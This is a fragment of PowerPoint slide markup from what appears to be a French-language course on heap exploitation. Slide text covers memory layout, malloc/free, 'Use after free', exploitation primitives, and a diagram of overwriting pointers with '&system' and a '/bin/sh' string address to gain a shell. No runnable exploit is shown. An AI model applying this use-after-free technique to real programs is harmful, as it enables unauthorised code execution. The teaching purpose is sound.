              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC9E4A1-F0E7-47E3-A833-322544831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312" y="4797152"/>
            <a:ext cx="3456384" cy="1125019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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F9CAEAA0-2104-4810-830E-BD14910937FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="65" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2899730" y="4154393"/>
            <a:ext cx="0" cy="570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ZoneTexte 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6593106F-75F6-484E-A1DE-A1271BE11005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828542" y="5078503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+mj-lt"/>
              </a:rPr>
              <a:t>= 0x41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>= 0x41414141</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB4F461-EB7A-4151-BF49-F9007CD1DDC7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0" name="Flèche : chevron 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FECDA21-7BFF-4776-B8A1-C4C833D9E6AE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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68ED2C3E-5622-4CB5-B998-3F475611FD3A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2" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A1D1CB-194C-4CF6-82DE-32195B5D7D3F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3" name="Flèche : chevron 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D05130B9-60C8-4C99-8F61-C235715CDAC4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34" name="Flèche : chevron 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4123805F-07B0-49AE-B7F0-36EA53766D59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34063759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F2132A-15B0-41A0-BC8A-E92502C4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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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264299D-80D3-42E3-9BC4-36240B76C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572" y="1700808"/>
            <a:ext cx="8992855" cy="50108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A746C8-384A-4EC9-B450-4E919B5D231A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1509919" y="6309320"/>
            <a:ext cx="1705761" cy="440443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062EE3-F8F0-4D57-BAE4-4EF1C8B254D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538469" y="4164287"/>
            <a:ext cx="6213715" cy="440443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chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACB52E1-5DA8-4452-9110-AEFE992B33FD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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA65ADF-ACAE-4D9E-B7DA-60F64E3B035D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19896209-789A-4DED-861F-9057BACA923A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45DA39C8-8368-47CB-B981-E928AA031B10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BEF67B9D-3314-4D18-92D5-88745A695280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12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{171E59B0-E462-428D-8C7B-8105F206BB0E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338243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587506-429A-423C-ABB2-4BF87E129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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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88EE572-8D8A-4E08-9992-22F974777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448072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploit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11A193-5035-47FA-B9D3-3F609236DDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687738" y="2784714"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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B86FC1-E85C-4524-9018-F5737E9F8A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4363046" y="2784714"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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5F58D9-E535-4997-A8F5-1979FA825288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038354" y="2784714"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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D225F2-66A4-4F0A-91CA-DAFF3FE979AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7713662" y="2784714"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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EE8C2E-3692-4547-9183-F5B545678E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9392977" y="2784714"/>
            <a:ext cx="1675308" cy="4480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…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24A8184-A32A-4904-BF2D-975A70ECBB64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213174" y="278471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collection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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6D4CBD9F-522C-4C57-A319-A8D4318D1434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2746641" y="3363403"/>
            <a:ext cx="909369" cy="648134"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31845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2AD0700-037F-4CEA-B2A0-CD20FB993782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690964" y="4142155"/>
            <a:ext cx="1619672" cy="7990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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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2BE46C-48F7-4344-B929-A36ABDC9CA91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303307" y="4142154"/>
            <a:ext cx="2630190" cy="799011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat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73527A-F5DA-43A3-AE4E-DE020AB7E139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7933497" y="4142155"/>
            <a:ext cx="3280794" cy="799010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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C37C1BF-B217-4526-B371-411A5CE65491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7457060" y="4101505"/>
            <a:ext cx="59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(1b)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965A58E-50B5-4AF4-BCA0-F11D301C1F35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10705226" y="4116251"/>
            <a:ext cx="65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(2b)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6073B7-AACD-43E4-BA91-C1E218C41EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2063552" y="4142155"/>
            <a:ext cx="1627412" cy="42967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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>str_bin_sh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824F5BB-DF42-4925-B2C9-747EDB9B1A47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109119" y="240876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0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D18F324-1FA4-453A-87C2-1576E55498F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804656" y="238446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49F56BE-BA38-43E5-A1F1-622965AA4341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479964" y="238446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17D8022-5A1F-426D-B5E8-63C3A1CF733A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8165995" y="23959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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connecteur : en angle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04580ED-9ED0-43AC-BDB4-30709B5F6031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3584295" y="2525749"/>
            <a:ext cx="909369" cy="2323442"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32543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406EE26B-055C-4710-907A-A2257F758DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5233720" y="2499866"/>
            <a:ext cx="909369" cy="2375208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 : en angle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60AC436F-D201-45DC-9320-F757BC7EB211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 rot="5400000">
            <a:off x="6071374" y="1662212"/>
            <a:ext cx="909369" cy="4050516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C330EFC6-ED0A-44CC-8C28-F264FAB22A2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2063552" y="4571833"/>
            <a:ext cx="162741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&amp;system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04CF4D0-726B-4E72-BF75-4B5633E3DF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985370" y="6032381"/>
            <a:ext cx="1627412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« /bin/sh »</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Connecteur : en angle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24095BE7-95C1-4CA6-B0F4-2AAD6870303F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="42" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="985370" y="4356993"/>
            <a:ext cx="1078182" cy="1860053"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 181891"/>
            </a:avLst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6483DA6F-3A5B-474A-9EDB-698E9179ABDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="5029390"/>
            <a:ext cx="162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libc</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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B92FEEE-F7C4-4B1D-A41D-4A8AD89EEAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985370" y="6401713"/>
            <a:ext cx="1627412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4E4FC64-3EA3-4073-9E2D-248693EADC47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988150" y="5425459"/>
            <a:ext cx="1627412" cy="60692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B0642634-8BAF-4A8F-B2CC-3E3AC8C34AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102693" y="5352694"/>
            <a:ext cx="1048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system:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Connecteur : en angle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9A11A2-10A6-49F6-8B46-468D89B43CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="1"/>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="988150" y="4756498"/>
            <a:ext cx="1075402" cy="972421"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 177423"/>
            </a:avLst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9" name="Image 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA7B0EF-F83A-41A1-AFDA-661FE4C2F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509" y="5507113"/>
            <a:ext cx="3456384" cy="1125019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="ZoneTexte 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3334D60-FB03-4B9D-844A-10D1034E1846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6804738" y="5788464"/>
            <a:ext cx="4556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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>= &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>str_bin_sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> =&gt; « /bin/sh »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>= &amp;system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Flèche : chevron 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8406CD73-0F34-4190-B90C-861236031028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5" name="Flèche : chevron 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841C4584-2314-408C-87A9-143501EF6901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36" name="Flèche : chevron 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E7D5791-AD9F-42F9-A0F4-CD3855663EA6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7" name="Flèche : chevron 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2637665C-74B7-4563-A314-59E3D2358C29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8" name="Flèche : chevron 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EED833B-E683-4943-A917-235A9FDACBBA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39" name="Flèche : chevron 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28546C68-CF9F-4060-B994-9A4115252F92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12004596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356442-6A34-4234-99C2-55E6EE869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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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82C07F2-86DF-4CDC-BF40-8BD148DF3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20"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3374071" y="1600200"/>
            <a:ext cx="5443857" cy="2188840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F65709-66F9-4F17-8EBF-EDC82C18B51C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lèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4A6E33-AFFE-43EC-825C-F8AA0D03C265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7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41518CA3-F542-40D6-9FB7-AF168E5F5A27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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B7C416-34EB-4CA6-BC25-0CFA214760B5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87AA51AE-3D10-4AE4-8D50-ADA4A1527A95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3371CC5E-81D5-44A9-8866-986C56CC05B2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2853248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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>layout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828800"/>
            <a:ext cx="4974804" cy="4726064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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5735960" y="1828800"/>
            <a:ext cx="6264696" cy="2824336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pile (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) : contient les variables local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Tas (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) : alloué dynamiquement (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/new/free/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>BSS : variables statiques non initialisées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>data : variables statiques initialisées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : code du programme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B5B199E-7927-481C-A304-7B7D15C0AD58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415480" y="4077072"/>
            <a:ext cx="3312368" cy="79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 : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E27E518-8C09-47BC-8C6E-038DE7EEB9B6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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout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7" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF31A84C-B48E-46A7-878A-723682D870CD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malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc,realloc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8" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9AAF2D-589F-42F7-95D2-2E356CFC36A0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Exploitation primitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD3C2C52-2B6E-488A-8400-506DA66F1110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is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predictable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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592123C9-D617-40B7-AE6D-EE6659C9459B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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A34303A-8FB1-4036-A02A-6C4AD8A9F89F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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
